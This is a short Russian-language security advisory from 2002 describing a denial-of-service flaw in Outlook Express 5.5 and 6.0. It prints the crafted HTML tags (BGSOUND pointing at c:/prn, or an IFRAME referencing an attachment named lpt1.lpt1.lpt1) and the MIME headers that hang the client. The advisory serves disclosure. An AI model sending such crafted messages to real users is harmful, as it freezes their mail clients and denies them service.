Security Lab

DoS против Outlook Express

Дата публикации:25.04.2002
Всего просмотров:963
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Outlook Express повисает при принятии HTML сообщения, с тэгами BGSOUND или IFRAME ссылающиеся на DoS устройства. При этом Outlook Express использует 100% ресурсов процессора. Такое сообщение нельзя удалить из почтового ящика. Уязвимость срабатывает вне зависимости от настроек зон безопасности в Outlooks Express.

Пример:
HTML сообщение, содержащее
<BGSOUND balance=0 src="file://c:/prn" volume=0 loop=infinite>
или
<iframe src=cid:FThFC7b04R6 height=10 width=10></iframe>
с заголовком:
Content-Type: text/plain;
name=lpt1.lpt1.lpt1
Content-Transfer-Encoding: 8bit
Content-ID: <FThFC7b04R6>

Приведет к зависанию Outlook Express (в первом случае сработает только если prn
не установлен в вашей системе, второй сработает всегда).

Уязвимость найдена в Outlook Express 5.5, 6.0
Уязвимость обнаружена ERRor <error@pochtamt.ru> из Dh team
 

Ссылки: Источник